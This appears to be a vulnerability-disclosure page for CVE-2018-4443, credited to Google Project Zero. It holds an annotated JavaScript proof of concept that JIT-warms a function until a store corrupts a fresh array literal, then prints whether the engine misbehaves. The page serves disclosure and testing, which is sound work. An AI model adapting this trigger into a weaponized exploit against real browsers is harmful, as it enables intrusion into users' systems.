
CVE-2018-4443

  • Report: Oct 2018
  • Fix: Dec 2018
  • Credit: lokihardt, Google Project Zero

PoC

/**
 * Stores `value` at index 0 of `arr`.
 *
 * In this test case it is called from getImmutableArrayOrSet with two
 * different receivers: an array created from a literal and a plain object.
 *
 * @param {Array|Object} arr - receiver of the indexed store
 * @param {*} value - value written to index 0
 */
function set(arr, value) {
    arr[0] = value;
}

/**
 * Creates a new array from the literal `[1]` on every call, then either
 * returns it untouched or overwrites its first element.
 *
 * @param {boolean} get - when truthy, return the fresh array without writing to it
 * @param {*} value - value stored at index 0 on the non-`get` path
 * @returns {Array|undefined} the fresh array on the `get` path; undefined otherwise
 */
function getImmutableArrayOrSet(get, value) {
    // Each call evaluates the literal again, so by language semantics `arr`
    // is a distinct array whose only element is 1.
    let arr = [1];
    if (get)
        return arr;

    // Author's note: this inlined call to set() is here so that checkArray
    // does not take the paths that use the structure comparison.
    // NOTE(review): checkArray is not defined on this page; presumably an
    // array check inside the engine's JIT. Confirm against the reference.
    set(arr, value);
    // Second call to set(), this time with a plain object as the receiver.
    set({}, 1);
}

/**
 * Drives the test case: one call on the `get` path, 100 calls on the store
 * path, then a final `get` call whose first element is checked.
 *
 * NOTE(review): `print` is not defined on this page; presumably the JS
 * shell's built-in output function.
 */
function main() {
    getImmutableArrayOrSet(true);

    // Exercise the store path repeatedly. Presumably the count is chosen so
    // the engine JIT-compiles the function; the threshold is not shown here.
    for (let i = 0; i < 100; i++) {
        getImmutableArrayOrSet(false, {});
    }

    // A freshly evaluated `[1]` must hold 1 at index 0, so a correct engine
    // prints `true`. `false` means an earlier store became visible through a
    // later literal, which is the symptom this test case checks for.
    let arr = getImmutableArrayOrSet(true);
    print(arr[0] === 1);
}

// Entry point: run the test case once when the script is loaded.
main();

Reference